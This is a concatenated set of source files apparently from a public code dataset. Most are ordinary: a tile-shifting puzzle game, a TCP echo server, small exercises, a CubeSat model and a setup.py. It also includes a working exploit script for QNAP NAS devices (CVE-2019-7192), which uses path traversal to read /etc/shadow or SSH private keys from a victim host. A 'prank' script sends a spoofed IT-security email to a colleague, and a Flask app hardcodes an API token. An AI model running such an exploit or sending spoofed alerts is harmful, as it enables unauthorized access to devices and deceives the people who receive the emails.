= grid[i][(j-1)%size]\n for i in range(size):\n _new_[i][0] = grid[-((i+1)%size)][-1]\n return _new_\n\n if way == 'left':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[i][(j+1)%size]\n for i in range(size):\n _new_[i][-1] = grid[-((i+1)%size)][0]\n return _new_\n \n if way == 'up':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[(i+1)%size][j]\n for i in range(size):\n _new_[-1][i] = grid[0][-((i+1)%size)]\n return _new_\n\n if way == 'down':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[(i-1)%size][j]\n for i in range(size):\n _new_[0][i] = grid[-1][-((i+1)%size)]\n return _new_\n\ndef torus_shift(grid, way):\n _new_ = make_grid(size)\n if way == 'right':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[i][(j-1)%size]\n return _new_\n\n if way == 'left':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[i][(j+1)%size]\n return _new_\n \n if way == 'up':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[(i+1)%size][j]\n return _new_\n\n if way == 'down':\n for i in range(size):\n for j in range(size):\n _new_[i][j] = grid[(i-1)%size][j]\n return _new_\n\n\nbase_nums = ['\\U00002460', '\\U00002461', '\\U00002462', '\\U00002463', '\\U00002464', '\\U00002465', '\\U00002466', '\\U00002467', '\\U00002468', '\\U00002469', '\\U0000246a', '\\U0000246b', '\\U0000246c', '\\U0000246d', '\\U0000246e', '\\U0000246f', '\\U00002470', '\\U00002471', '\\U00002472', '\\U00002473',]\n\nboard_colors = [black,yellow,cyan,red,magenta,yellow]\nboard_colors = [colors.bg_rgb(250,250,0),\n colors.bg_rgb(50,150,255),\n colors.bg_rgb(255,80,80),\n colors.bg_rgb(50,205,55)]\n\n#board_colors = [white, black, white, black]\n\nmargin = ' '*5\nwhite = colors.rgb(255,255,255)\nblack = colors.rgb(0,0,0)\n\ndef print_grid(grid):\n for row in grid:\n print(margin + black, end = '')\n for e in row:\n print(board_colors[e%size] + base_nums[e], end = '')\n print(colors.reset)\n print('\\n')\n\n\nleft = '◀' \nright = '▶' \nup = '▲'\ndown = '▼'\n\ndef arrow_string(way):\n return ''\n if way == 'left':\n return margin + white + left + black + up + down + right \n if way == 'up':\n return margin + black + left +white + up +black + down + right \n if way == 'down':\n return margin + black + left + up + white + down + black + right \n if way == 'right':\n return margin + black + left + up + down + white + right + black \n\ndef play_auto(grid):\n print('shuffling')\n key = random.choice(['d','a','w','s'])\n print_grid(grid)\n if key == 'A':\n grid = torus_shift(grid,'up')\n print_grid(grid)\n print(arrow_string('up'))\n elif key == 'D':\n grid = torus_shift(grid,'left')\n print_grid(grid)\n print(arrow_string('left'))\n elif key == 'C':\n grid = torus_shift(grid,'right')\n print_grid(grid)\n print(arrow_string('right'))\n elif key == 'B':\n grid = torus_shift(grid,'down')\n print_grid(grid)\n print(arrow_string('down'))\n\n elif key == 'd' or key == '6':\n grid = mobius_shift(grid,'right')\n print_grid(grid)\n print(arrow_string('right'))\n elif key == 'a' or key == '4':\n grid = mobius_shift(grid,'left')\n print_grid(grid)\n print(arrow_string('left'))\n elif key == 'w' or key == '8':\n grid = mobius_shift(grid, 'up' )\n print_grid(grid)\n print(arrow_string('up'))\n elif key == 's' or key == '2' or key == '5':\n grid = mobius_shift(grid, 'down' )\n print_grid(grid)\n print(arrow_string('down'))\n return grid\n\n\ndef play(grid):\n print_grid(grid)\n key = getch()[-1]\n\n print_grid(grid)\n if key == 'A':\n grid = torus_shift(grid,'up')\n print_grid(grid)\n print(arrow_string('up'))\n elif key == 'D':\n grid = torus_shift(grid,'left')\n print_grid(grid)\n print(arrow_string('left'))\n elif key == 'C':\n grid = torus_shift(grid,'right')\n print_grid(grid)\n print(arrow_string('right'))\n elif key == 'B':\n grid = torus_shift(grid,'down')\n print_grid(grid)\n print(arrow_string('down'))\n\n elif key == 'd' or key == '6':\n grid = mobius_shift(grid,'right')\n print_grid(grid)\n print(arrow_string('right'))\n elif key == 'a' or key == '4':\n grid = mobius_shift(grid,'left')\n print_grid(grid)\n print(arrow_string('left'))\n elif key == 'w' or key == '8':\n grid = mobius_shift(grid, 'up' )\n print_grid(grid)\n print(arrow_string('up'))\n elif key == 's' or key == '2' or key == '5':\n grid = mobius_shift(grid, 'down' )\n print_grid(grid)\n print(arrow_string('down'))\n return grid\n\n\"\"\"\n\n#for competition mode\nfor i in range(1000):\n grid = play_auto(grid)\n time.sleep(1)\n\"\"\"\nwhile 1:\n grid = play(grid)\n","sub_path":"games/sixteens.py","file_name":"sixteens.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"88827084","text":"import socket\n\nip_address = '127.0.0.1'\nport_number = 2345\n\nserver_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_sock.bind((ip_address, port_number))\nprint(\"Server socket open...\")\n\nprint(\"Listening...\")\nserver_sock.listen()\n\nclient_sock,addr = server_sock.accept()\nprint(\"Connected with client\")\n\ndata = client_sock.recv(5000)\nprint(\"Received Message from client : \" + data.decode())\n\nclient_sock.send(data)\nprint(\"Send Message back to client\")\n","sub_path":"TCP/simple_example/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"361304586","text":"import smtplib\nimport email.utils\nfrom email.mime.text import MIMEText\nfrom collections import namedtuple\n\n\nPrankee = namedtuple('Prankee', 'name id email')\ncolleague = Prankee('Colleague', 'colleague_id', 'colleague@email.com')\nsubject = '[IT Information] %s we detect unauthorized actions from your account' % colleague.name\nbody = '''Dear user %s (%s),\nIT detected unauthorized actions from your account.\nIf this wasn't you. It's very likely your account has been hacked.\nPlease change you credential immediately.\nHave a great day,\n-your friend in IT\n''' % (colleague.id, colleague.name)\nsender = ('IT-Information', 'IT.Information@email.com')\nrecipients = [(colleague.name, colleague.email)]\n\nmsg = MIMEText(body)\nmsg['To'] = ', '.join([email.utils.formataddr(recpt) for recpt in recipients])\nmsg['From'] = email.utils.formataddr(sender)\nmsg['Subject'] = subject\nwith smtplib.SMTP('localhost', 25000) as server:\n # server.set_debuglevel(True)\n server.sendmail(sender, recipients, msg.as_string())\n","sub_path":"week8/prank.py","file_name":"prank.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"527512908","text":"#!/usr/bin/env python3\n\n# https://codeforces.com/problemset/problem/1328/A\n\nt = int(input())\nrl = []\nfor i in range(t):\n a,b = list(map(int,input().split()))\n rl.append((b-a%b)%b)\n[print(r) for r in rl]\n \n","sub_path":"codeforces/math数学/800/1328A整除问题.py","file_name":"1328A整除问题.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"51493388","text":"def string():\n greeting = \"Spaghet\"\n name = \"ASCII Chess V. 1\"\n doa = \"https://images.chesscomfiles.com/uploads/v1/images_users/tiny_mce/SamCopeland/phpuTejFE.gif\"\n job = \"Our original project, designed to make chess. Note that we did not attempt to reduce the complexity of the code.\"\n embed = \"https://repl.it/@KyleMyint/ASCII-Chess?lite=true\"\n info = {\"greeting\": greeting, \"name\": name, \"doa\": doa, \"job\": job, \"embed\": embed}\n return info\n\n\ndef billards():\n greeting = \"Speedrun\"\n name = \"Ultimate Tic Tac Toe\"\n doa = \"https://lh3.googleusercontent.com/proxy/lfnmXruJn_lshuI73aiV7Jc81SPmkOfHXIYMCX2lAONZguCxXODYgvs18zt3rShLNiDneS_PXKnn\"\n job = \"We made this project on a whim, wanting to show something for WOW day. We eventually decided to finish it later.\"\n embed = \"https://repl.it/@colinszeto/Python-Hello-Series?lite=true\"\n info = {\"greeting\": greeting, \"name\": name, \"doa\": doa, \"job\": job, \"embed\": embed}\n return info\n\n\ndef ship():\n greeting = \"Hey, Hey, Hey!\"\n name = \"Ship with Star Trails\"\n doa = \"Week 2\"\n job = \"Testing Print with Color\"\n embed = \"https://repl.it/@colinszeto/Ship-moving-test?lite=true\"\n info = {\"greeting\": greeting, \"name\": name, \"doa\": doa, \"job\": job, \"embed\": embed}\n return info\n\n\ndef alldata():\n return [string(), billards()]\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"153159388","text":"\"\"\"\nFebruary 2015\nHowon Byun HB2458\n\"\"\"\nimport P35_f as rCalculator\n\"\"\"\nmain method that takes in user input for given type of calculation one desires\n\"\"\"\ndef main():\n\tgauge = int(input(\"Enter a gauge: \"))\n\td = rCalculator.diamater(gauge)\n\tprint(d)\n\n\tclength = int(input(\"Enter length of copper wire: \"))\n\tcgauge = int(input(\"Enter gauge of copper wire: \"))\n\tcopper = rCalculator.copperWireResistance(clength, cgauge)\n\tprint(copper)\n\n\talength = int(input(\"Enter length of aluminum wire: \"))\n\tagauge = int(input(\"Enter gauge of aluminum wire: \"))\n\taluminum = rCalculator.aluminumWireResistance(alength, agauge)\n\tprint(aluminum)\n\nmain()","sub_path":"Second Assignment/Part 1/P35_m.py","file_name":"P35_m.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"470683265","text":"__name__ = \"autoaccept\"\n\nimport engine, pyautogui, threading, pynput\nmouseController = pynput.mouse.Controller()\n\n@engine.load_function(\"autoaccept\")\ndef init_module(self):\n self.mkdir(\"packages/images/\")\n\n@engine.locate_event(\"autoaccept\", \"packages/images/acceptimage.png\", confidence=0.8)\ndef accept_located(self, x, y):\n print(f\"[AutoAccept] Found accept image on x={x}, y={y}\")\n mouseController.position = (x, y)\n mouseController.press(pynput.mouse.Button.left)\n mouseController.release(pynput.mouse.Button.left)","sub_path":"packages/autoaccept.py","file_name":"autoaccept.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"97851551","text":"#!/bin/python3\n\nimport sys\n\ndef catsandamouse(x,y,z):\n distA = abs(z - x)\n distB = abs(z - y)\n if distA > distB:\n return \"Cat B\"\n elif distB > distA:\n return \"Cat A\"\n else:\n return \"Mouse C\"\n\nq = int(input().strip())\nfor a0 in range(q):\n x,y,z = input().strip().split(' ')\n x,y,z = [int(x),int(y),int(z)]\n result = catsandamouse(x,y,z)\n print(result)","sub_path":"hackerrank/implementation/CatsAndAMouse.py","file_name":"CatsAndAMouse.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"424416308","text":"from geometry import Cube, origin\n\n\nclass CubeSat(Cube):\n d = {\n '-2': 'lb',\n '-1': 'rf',\n '-0': 'lf',\n '0': 'rb',\n '1': 'lb',\n '2': 'rb'\n }\n activeThruster = None\n activeThrusterCounter = 0\n activeThrusterCounterMaximum = 10\n\n def __init__(self, dimension=1, centroid=origin, mass=1, thrusters=None, randomAV=False):\n super(CubeSat, self).__init__(dimension, centroid, mass, randomAV)\n self.thrusters = {thruster.name: thruster for thruster in thrusters}\n\n def apply_thrust(self, thruster):\n self.activeThruster = thruster\n x, y, z = self.thrusters[thruster].thrustDirection\n self._angularVelocity.x += x\n self._angularVelocity.y += y\n self._angularVelocity.z += z\n\n def decide(self):\n avc = self.avc\n if avc != (0, 0, 0):\n setsd = [abs(_) for _ in avc]\n criticalIndex = setsd.index(max(setsd))\n criticalValue = avc[criticalIndex]\n decision = str('{}{}'.format('-' if criticalValue < 0 else '', criticalIndex))\n self.apply_thrust(self.d[decision])\n\n @property\n def atc(self):\n return self.activeThrusterCounter\n\n @property\n def atcm(self):\n return self.activeThrusterCounterMaximum\n\n def print_info(self):\n print(self.activeThruster,\n self._angularVelocity['x'],\n self._angularVelocity['y'],\n self._angularVelocity['z'])\n","sub_path":"cubesat.py","file_name":"cubesat.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"494037170","text":"import numpy as np\nfrom .base_humanoid import HumanoidEnv\n\n\nclass HumanoidHoldToThrowEnv(HumanoidEnv):\n def __init__(self,\n xml_file='robots/humanoid_CMU_with_ball.xml',\n ctrl_cost_weight=0.0,\n contact_cost_weight=0.0,\n contact_cost_range=(-np.inf, 10.0),\n reset_noise_scale=1e-2,\n exclude_current_positions_from_observation=False,\n healthy_reward=2.0,\n terminate_when_unhealthy=True,\n ball_z_range=(0.1, float(\"inf\"))):\n\n self._healthy_reward = healthy_reward\n self._terminate_when_unhealthy = terminate_when_unhealthy\n self._ball_z_range = ball_z_range\n self.started = False\n self.orig_ball_height = None\n self.steps = 0\n self.transfer_steps = 3e6/8\n\n HumanoidEnv.__init__(self,\n xml_file,\n ctrl_cost_weight,\n contact_cost_weight,\n contact_cost_range,\n reset_noise_scale,\n exclude_current_positions_from_observation)\n\n def reset_model(self):\n observation = HumanoidEnv.reset_model(self)\n self.orig_ball_height = None\n return observation\n\n\n @property\n def healthy_reward(self):\n return float(\n self.is_healthy\n or self._terminate_when_unhealthy\n ) * self._healthy_reward\n\n\n @property\n def is_healthy(self):\n min_z, max_z = self._ball_z_range\n ball_height = self.sim.data.get_body_xipos(\"ball\")[2]\n is_healthy = min_z < ball_height < max_z\n\n return is_healthy\n\n @property\n def done(self):\n done = ((not self.is_healthy)\n if self._terminate_when_unhealthy\n else False)\n return done\n\n\n def step(self, action):\n ball_x_before = self.sim.data.get_body_xipos('ball')[0]\n self.do_simulation(action, self.frame_skip)\n ball_x_after = self.sim.data.get_body_xipos('ball')[0]\n self.steps += 1\n\n ctrl_cost = self.control_cost(action)\n contact_cost = self.contact_cost\n\n alpha = min(self.steps/self.transfer_steps, 1)\n\n if self.orig_ball_height is None:\n self.orig_ball_height = self.sim.data.get_body_xipos(\"ball\")[2]\n\n ball_height = self.sim.data.get_body_xipos(\"ball\")[2]\n reward_hold = self.orig_ball_height - abs(self.orig_ball_height - ball_height)\n reward_throw = ball_x_after - ball_x_before\n rewards = (1-alpha) * reward_hold + alpha * reward_throw\n costs = ctrl_cost + contact_cost\n\n reward = rewards - costs\n observation = self._get_obs()\n done = self.done \n if not self.started:\n self.started = True\n done = False\n\n return observation, reward, done, {}\n\n","sub_path":"OurEnvs/humanoid_hold_to_throw.py","file_name":"humanoid_hold_to_throw.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"467298802","text":"def is_number(x):\n \"\"\" Является ли 'x' вещественным десятичным числом.\"\"\"\n x = list(x)\n i = \"\" # Для \"склеивания\" в сплошную строку содержимого списка.\n test = 0\n if any((ord(n) < 45 or ord(n) > 46) and (ord(n) < 48 or ord(n) > 57) for n in x):\n test = 1\n elif \"-\" in x and (x.count(\"-\") > 1 or x.index(\"-\") != 0 or (\".\" in x and x.index(\".\") == 1)):\n test = 2\n elif \".\" in x and (x.count(\".\") > 1 or x.index(\".\") == 0 or x.index(\".\") == (len(x)-1)):\n test = 3\n elif \"0\" in x and len(x) > 1 and x[0] == \"0\" and x[1] != \".\":\n test = 4\n elif \"0\" in x and len(x) > 2 and x[0] == \"-\" and x[1] == \"0\" and x[2] != \".\":\n test = 5\n elif len(x) > 1 and all(n == \"0\" or n == \"-\" or n == \".\" for n in x):\n test = 6\n elif len(x) == 1 and x[0] == \"-\":\n test = 7\n else:\n test = 0\n if test == 0:\n# print(i.join(x))\n return True\n elif test > 0:\n return False\n#######################\nwhile True:\n x = input(\"\\ \")\n if is_number(x):\n print(x)\n","sub_path":"python/3rdWeek/is_number.py","file_name":"is_number.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"345913270","text":"import os\nfrom flask import Flask, jsonify, render_template, request\nfrom datetime import datetime, timedelta\napp = Flask(__name__)\n\nimport pyrise\n\n# Log into the Highrise server\npyrise.Highrise.set_server('https://testingaccount1.highrisehq.com/')\npyrise.Highrise.auth('8d067f661c6611c3c3e40b245dd9de37')\n \n# This is the list of tasks that should be attached to each person\ntask_template = []\ntask_template.append(['Send welcome email',1])\ntask_template.append(['Schedule phone call',7])\ntask_template.append(['First phone call',14])\ntask_template.append(['Convert to paid or end trial',40])\ntask_template.append(['Change tag to reflect new status',40])\n\n\n# This is just for testing purposes, to make sure the app is running properly\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n\n@app.route('/test')\ndef test_app():\n\treturn render_template('test.html')\n\n\n@app.route('/add_to_highrise')\ndef add_hr():\n\tpass\n\t'''Receives a signup request from JSON, sends it to Highrise with attached signup tasks'''\n\t'''\n\t#Receive JSON data\n\tname = request.args.get('name')\n\temail = request.args.get('email')\n\tcompany = request.args.get('company')\n\tcountry = request.args.get('country')\n\t\n\t#Split name into first and last name. If there's no space, then we don't split\n\tsplitter = name.find(\" \")\n\tif splitter == -1:\n\t\tfirst_name = name\n\t\tlast_name = \"\"\n\telse:\n\t\tfirst_name = name[:splitter]\n\t\tlast_name = name[splitter+1:]\n\t\n\t#Create new person in Highrise\n\tp = pyrise.Person()\n\tp.first_name = first_name\n\tp.last_name = last_name\t\t\n\tp.contact_data.email_addresses.append(pyrise.EmailAddress(address=email))\n\t\n\tp.save()\n\t\n\tp.add_note('Company name: ' + company + \", located in \" + country)\n\tp.add_tag('Website signup')\n\t\n\t# Add tasks to the person\n\tfor eachtask in task_template:\n\t\t\n\t\tt = pyrise.Task()\n\t\tt.body = eachtask[0]\n\t\tt.due_at = datetime.now() + timedelta(days=eachtask[1])\n\t\tt.subject_id = p.id\t\n\t\tt.subject_type = 'Party'\t\n\t\tt.save()\n\t\n\treturn jsonify(result=first_name + \" \" + last_name + \" \" + country)'''\n\n\nif __name__ == '__main__':\n\t# Bind to PORT if defined, otherwise default to 5000.\n\tport = int(os.environ.get('PORT', 5000))\n\tapp.run(host='0.0.0.0', port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"117024757","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/hooks/hdfs_hook.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 3967 bytes\nfrom airflow import configuration\nfrom airflow.exceptions import AirflowException\nfrom airflow.hooks.base_hook import BaseHook\ntry:\n from snakebite.client import Client, HAClient, Namenode, AutoConfigClient\n snakebite_loaded = True\nexcept ImportError:\n snakebite_loaded = False\n\nclass HDFSHookException(AirflowException):\n pass\n\n\nclass HDFSHook(BaseHook):\n __doc__ = \"\\n Interact with HDFS. This class is a wrapper around the snakebite library.\\n\\n :param hdfs_conn_id: Connection id to fetch connection info\\n :type hdfs_conn_id: str\\n :param proxy_user: effective user for HDFS operations\\n :type proxy_user: str\\n :param autoconfig: use snakebite's automatically configured client\\n :type autoconfig: bool\\n \"\n\n def __init__(self, hdfs_conn_id='hdfs_default', proxy_user=None, autoconfig=False):\n if not snakebite_loaded:\n raise ImportError('This HDFSHook implementation requires snakebite, but snakebite is not compatible with Python 3 (as of August 2015). Please use Python 2 if you require this hook -- or help by submitting a PR!')\n self.hdfs_conn_id = hdfs_conn_id\n self.proxy_user = proxy_user\n self.autoconfig = autoconfig\n\n def get_conn(self):\n \"\"\"\n Returns a snakebite HDFSClient object.\n \"\"\"\n effective_user = self.proxy_user\n autoconfig = self.autoconfig\n use_sasl = configuration.conf.get('core', 'security') == 'kerberos'\n try:\n connections = self.get_connections(self.hdfs_conn_id)\n if not effective_user:\n effective_user = connections[0].login\n if not autoconfig:\n autoconfig = connections[0].extra_dejson.get('autoconfig', False)\n hdfs_namenode_principal = connections[0].extra_dejson.get('hdfs_namenode_principal')\n except AirflowException:\n if not autoconfig:\n raise\n\n if autoconfig:\n client = AutoConfigClient(effective_user=effective_user, use_sasl=use_sasl)\n else:\n if len(connections) == 1:\n client = Client((connections[0].host), (connections[0].port), effective_user=effective_user,\n use_sasl=use_sasl,\n hdfs_namenode_principal=hdfs_namenode_principal)\n else:\n if len(connections) > 1:\n nn = [Namenode(conn.host, conn.port) for conn in connections]\n client = HAClient(nn, effective_user=effective_user, use_sasl=use_sasl,\n hdfs_namenode_principal=hdfs_namenode_principal)\n else:\n raise HDFSHookException(\"conn_id doesn't exist in the repository and autoconfig is not specified\")\n return client","sub_path":"pycfiles/apache_airflow_arup-1.10.5-py3.6/hdfs_hook.cpython-36.py","file_name":"hdfs_hook.cpython-36.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"284929597","text":"import setuptools\r\nfrom canoser.version import version\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n content = fh.read()\r\n arr = content.split(\"\\n\")\r\n long_description = \"\\n\".join(arr[4:])\r\n\r\nsetuptools.setup(\r\n name=\"canoser\",\r\n version=version,\r\n author=\"yuan xinyu\",\r\n author_email=\"yuanxinyu.hangzhou@gmail.com\",\r\n description=\"A python implementation of the LCS(Libra Canonical Serialization) for the Libra network.\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/yuan-xy/canoser-python.git\",\r\n packages=setuptools.find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ],\r\n python_requires='>=3.6',\r\n)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"567377057","text":"# proj4_william_verthein.py\n#\n# This program takes a grid of numbers as input to be evaluated.\n# It then determines whether the grid is a Lo Shu Magic Square or not.\n#\ndef main():\n '''The program starts by taking the file input and building a matrix from the data. The data is then evaluated to ensure all rows, columns, and each diagonal adds up to 15. It's then evaluated to ensure there are no repeated numbers in the square. This program can be used with any size square.'''\n\n matrix = read_file()\n if not row_sum(matrix) or not column_sum(matrix) or not diagonal_sum(matrix) or not duplicate_test(matrix):\n print(\"The inputted grid is NOT a Lo Shu Magic Square. Sorry.\")\n else:\n print(\"Miraculously, this is a Lo Shu Magic Square. 1 of 8 in fact...\")\n\n# Read file input by the user. Also, forms the matrix of the Magic Square.\ndef read_file():\n file_name = input('Enter the name of your Lo Shu Magic Square file: ')\n with open(file_name, \"r\") as f:\n matrix = [[int(c) for c in line.strip('\\n').split(',')] for line in f]\n for i in range(len(matrix)):\n print(matrix[i])\n return matrix\n\n# Function takes matrix argument, and evaluates each row to ensure they add\n# up to 15\ndef row_sum(matrix):\n for i in range(len(matrix)):\n total = 0\n for j in range(len(matrix)):\n total += matrix[i][j]\n if total != 15:\n return False\n return True\n\n# Function takes matrix argument, and evaluates each column to ensure they\n# add up to 15\ndef column_sum(matrix):\n for j in range(len(matrix)):\n total = 0\n for i in range(len(matrix)):\n total += matrix[i][j]\n if total != 15:\n return False\n return True\n\n# Function takes matrix argument, and evaluates each diagonal to ensure they\n# add up to 15\ndef diagonal_sum(matrix):\n total = 0\n for i in range(len(matrix)):\n total += matrix[i][i]\n if total != 15:\n return False\n total = 0\n for i in range(len(matrix)):\n total += matrix[i][-1-i]\n if total != 15:\n return False\n return True\n\n# Function takes matrix argument, and evaluates whether there are duplicate\n# digits in the square\ndef duplicate_test(matrix):\n nmbr_lst = []\n for i in range(len(matrix)):\n nmbr_lst += matrix[i]\n nmbr_lst.sort()\n return nmbr_lst == list(range(1,len(nmbr_lst)+1))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"proj4_william_verthein.py","file_name":"proj4_william_verthein.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"170991924","text":"#!/usr/bin/python3\n\nimport requests\nimport re\nimport sys\n\n# hide ssl error\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n# Console colors\nW = '\\033[0m' # white (normal)\nR = '\\033[31m' # red\nG = '\\033[32m' # green\n\n\ndef QNAP_CVE_2019_7192(victim_ip):\n try:\n # perform RCE and check if payload sent successfully\n exploit_result = file_disclosure(victim_ip)\n if exploit_result:\n print(G+'QNAP_CVE_2019_7192 exploit successful!'+W)\n return 'QNAP_CVE_2019_7192 exploit successful!'\n else:\n print(R+'QNAP_CVE_2019_7192 exploit failed!'+W)\n return 'QNAP_CVE_2019_7192 exploit failed!'\n except KeyboardInterrupt:\n print('\\n' + 'Program exiting...')\n sys.exit()\n\n\ndef file_disclosure(victim_ip):\n url = 'http://' + victim_ip + ':8080'\n req = requests.Session()\n post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}\n album_id_response = req.post(\n url + \"/photo/p/api/album.php\", data=post_data, verify=False, timeout=10)\n\n # if no album id\n if album_id_response.status_code != 200:\n print(R+\"Album ID not found! Not vulnerable!\"+W)\n return False\n\n album_id = re.search('(?<=).*?(?=)',\n album_id_response.text).group()\n\n access_code_response = req.get(\n url + \"/photo/slideshow.php?album=\" + album_id, verify=False, timeout=10)\n\n # if no access code\n if access_code_response.status_code != 200:\n print(R+\"Access code not found! Not vulnerable!\"+W)\n return False\n\n access_code = re.search(\n \"(?<=encodeURIComponent\\\\(').*?(?=')\", access_code_response.text).group()\n\n # ask for file to read\n print(\"Possible interesting files:\")\n print(\"/etc/passwd\")\n print(\"/etc/shadow\")\n print(\"/etc/hostname\")\n print(\"/root/.ssh/id_rsa\")\n file_to_read = input(\"Enter the file to read: \")\n file_to_read_traversed = \"./../../../../..\" + file_to_read\n\n post_data = {'album': album_id, 'a': 'caption',\n 'ac': access_code, 'f': 'UMGObv', 'filename': file_to_read_traversed}\n file_read_response = req.post(\n url + \"/photo/p/api/video.php\", data=post_data, verify=False, timeout=10)\n\n print()\n print(file_to_read + \" file content:\")\n print(file_read_response.text)\n return True\n","sub_path":"exploits/NAS/QNAP_CVE_2019_7192.py","file_name":"QNAP_CVE_2019_7192.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"539664032","text":"from setuptools import setup\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.txt')) as f:\n long_description = f.read()\n\nsetup(\n name='KalturaApiClient',\n version='15.20.0',\n url='https://github.com/kaltura/KalturaGeneratedAPIClientsPython',\n packages=['KalturaClient', 'KalturaClient.Plugins'],\n install_requires=['requests>=2.4.2', 'requests-toolbelt', 'six'],\n license='AGPLv3+',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n\n 'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',\n\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n keywords='Kaltura API client',\n description='A Python module for accessing the Kaltura API.',\n long_description=long_description,\n long_description_content_type=\"text/plain\"\n)\n","sub_path":"pypi_install_script/KalturaApiClient-15.20.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"184433277","text":"from itertools import combinations\r\nfrom sys import stdin\r\n \r\nt = int(input())\r\nfor i in range(t):\r\n\tn = int(input())\r\n\ta = map(int, stdin.readline().split())\r\n\tb = sum(1 for i in a if i <= 0)\r\n\tif (b == len(a)):\r\n\t\tprint (sum(a))\r\n\telse:\r\n\t\tlis1 = []\r\n\t\tsum1 = 0\r\n\t\tfor j in range(1, len(a)):\r\n\t\t\tlis1.append(tuple(combinations(a, i)))\r\n\t\tfor j in lis1:\r\n\t\t\tsum1 += (len(j)*sum(j)) + ((len(a)-len(j))*(set(a)-set(j)))\r\n\t\tprint (sum1)\r\n","sub_path":"NEO01 - 40-100.py","file_name":"NEO01 - 40-100.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"377283056","text":"def isWordGuessed(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secretWord are in lettersGuessed;\n False otherwise\n '''\n # FILL IN YOUR CODE HERE...\n temp=['_'] * len(secretWord)\n letters_used=[]\n for letter in range(0,len(lettersGuessed)):\n if (lettersGuessed[letter] not in letters_used):\n for letter_in_word in range(0, len(secretWord)):\n if (lettersGuessed[letter] == secretWord[letter_in_word]):\n temp[letter_in_word] = (lettersGuessed[letter])\n letters_used.append(lettersGuessed[letter])\n\n return (' '.join(temp))\n\n\ndef main():\n print (isWordGuessed('broccoli', ['z', 'x', 'q', 'b', 'r', 'o', 'c', 'c', 'o', 'l', 'i']))\n print (isWordGuessed('apple', ['e', 'i', 'k', 'p', 'r', 